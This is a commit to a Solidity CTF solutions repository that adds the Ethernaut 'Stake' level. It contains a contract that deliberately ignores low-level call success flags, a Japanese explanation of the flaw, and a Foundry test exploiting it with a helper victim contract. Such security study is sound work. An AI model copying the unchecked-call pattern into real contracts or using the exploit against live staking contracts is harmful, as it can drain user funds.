add Ethernaut 31. Stake

Author: minaminao

README.md

@@ -22,6 +22,7 @@ Please be aware that these contain spoilers. For contribution guidelines, please
   - [Forced Ether transfers to non-payable contracts via `selfdestruct`](#forced-ether-transfers-to-non-payable-contracts-via-selfdestruct)
   - [Large gas consumption by contract callees](#large-gas-consumption-by-contract-callees)
   - [Forgetting to set `view`/`pure` to interface and abstract contract functions](#forgetting-to-set-viewpure-to-interface-and-abstract-contract-functions)
+  - [Missing success flag checks in low-level calls](#missing-success-flag-checks-in-low-level-calls)
   - [`view` functions that do not always return same values](#view-functions-that-do-not-always-return-same-values)
   - [Mistakes in setting `storage` and `memory`](#mistakes-in-setting-storage-and-memory)
   - [Tracing transactions](#tracing-transactions)
@@ -218,6 +219,13 @@ Note:
 | ----------------------------------------- | -------------- |
 | [Ethernaut: 11. Elevator](src/Ethernaut/) | interface      |
 
+### Missing success flag checks in low-level calls
+- If a contract performs low-level calls (such as call, delegatecall, or staticcall) without checking the returned success flag, it may mistakenly assume the call succeeded, potentially leading to vulnerabilities.
+
+| Challenge                              | Note, Keywords |
+| -------------------------------------- | -------------- |
+| [Ethernaut: 31. Stake](src/Ethernaut/) |                |
+
 ### `view` functions that do not always return same values
 - Since `view` functions can read state, they can be conditionally branched based on state and do not necessarily return the same value.
 

src/Ethernaut/README.md

@@ -460,3 +460,11 @@ forge script SwitchExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RP
 ```sh
 forge test --match-contract HigherOrderExploit -vvvv
 ```
+
+## 31. Stake
+[Challenge & Exploit codes](Stake)
+
+**Test**
+```sh
+forge test --match-contract StakeExploit -vvvv
+```

src/Ethernaut/Stake/Exploit.t.sol

@@ -0,0 +1,35 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.13;
+
+import "forge-std/Test.sol";
+import "./StakeFactory.sol";
+
+contract StakeExploitTest is Test {
+    function test() public {
+        address playerAddress = makeAddr("player");
+        vm.deal(playerAddress, 1 ether);
+        StakeFactory factory = new StakeFactory();
+        address instanceAddress = factory.createInstance(playerAddress);
+
+        vm.startPrank(playerAddress, playerAddress);
+
+        new Victim{value: 0.003 ether}(instanceAddress);
+
+        Stake instance = Stake(instanceAddress);
+        ERC20(instance.WETH()).approve(address(instance), type(uint256).max);
+
+        instance.StakeWETH(0.002 ether);
+        instance.Unstake(0.002 ether);
+
+        vm.stopPrank();
+
+        assertTrue(factory.validateInstance(payable(instanceAddress), playerAddress), "Invalid Instance");
+    }
+}
+
+contract Victim {
+    constructor(address instanceAddress) payable {
+        Stake instance = Stake(instanceAddress);
+        instance.StakeETH{value: msg.value}();
+    }
+}

src/Ethernaut/Stake/README.md

@@ -0,0 +1,8 @@
+## Overview
+- Stake: ETH と WETH をステークできるコントラクト
+- `allowance(address,address)` と `transferFrom(address,address,uint256)` が、`abi.encodeWithSelector` を用いて呼び出されている
+
+## Solution
+- `allowance(address,address)` と `transferFrom(address,address,uint256)` が成功したかどうかがチェックされていない
+- `transferFrom` が失敗するが、`StakeWETH` が成功するようなトランザクションを投げれば良い
+- 条件 `_instance.balance != 0 && instance.totalStaked() > _instance.balance && instance.UserStake(_player) == 0 && instance.Stakers(_player)` を満たすために被害者コントラクトを用意する

src/Ethernaut/Stake/Stake.sol

@@ -0,0 +1,49 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+contract Stake {
+    uint256 public totalStaked;
+    mapping(address => uint256) public UserStake;
+    mapping(address => bool) public Stakers;
+    address public WETH;
+
+    constructor(address _weth) payable {
+        totalStaked += msg.value;
+        WETH = _weth;
+    }
+
+    function StakeETH() public payable {
+        require(msg.value > 0.001 ether, "Don't be cheap");
+        totalStaked += msg.value;
+        UserStake[msg.sender] += msg.value;
+        Stakers[msg.sender] = true;
+    }
+
+    function StakeWETH(uint256 amount) public returns (bool) {
+        require(amount > 0.001 ether, "Don't be cheap");
+        (, bytes memory allowance) = WETH.call(abi.encodeWithSelector(0xdd62ed3e, msg.sender, address(this)));
+        require(bytesToUint(allowance) >= amount, "How am I moving the funds honey?");
+        totalStaked += amount;
+        UserStake[msg.sender] += amount;
+        (bool transferred,) = WETH.call(abi.encodeWithSelector(0x23b872dd, msg.sender, address(this), amount));
+        Stakers[msg.sender] = true;
+        return transferred;
+    }
+
+    function Unstake(uint256 amount) public returns (bool) {
+        require(UserStake[msg.sender] >= amount, "Don't be greedy");
+        UserStake[msg.sender] -= amount;
+        totalStaked -= amount;
+        (bool success,) = payable(msg.sender).call{value: amount}("");
+        return success;
+    }
+
+    function bytesToUint(bytes memory data) internal pure returns (uint256) {
+        require(data.length >= 32, "Data length must be at least 32 bytes");
+        uint256 result;
+        assembly {
+            result := mload(add(data, 0x20))
+        }
+        return result;
+    }
+}

src/Ethernaut/Stake/StakeFactory.sol

@@ -0,0 +1,26 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+
+import "../Ethernaut/Level.sol";
+import "./Stake.sol";
+import "openzeppelin-contracts/contracts/token/ERC20/ERC20.sol";
+
+contract DWETH is ERC20 {
+    constructor() ERC20("DummyWETH", "DWETH") {
+        _mint(msg.sender, 1000000 * 10 ** decimals());
+    }
+}
+
+contract StakeFactory is Level {
+    address _dweth = address(new DWETH());
+
+    function createInstance(address _player) public payable override returns (address) {
+        return address(new Stake(address(_dweth)));
+    }
+
+    function validateInstance(address payable _instance, address _player) public view override returns (bool) {
+        Stake instance = Stake(_instance);
+        return _instance.balance != 0 && instance.totalStaked() > _instance.balance && instance.UserStake(_player) == 0
+            && instance.Stakers(_player);
+    }
+}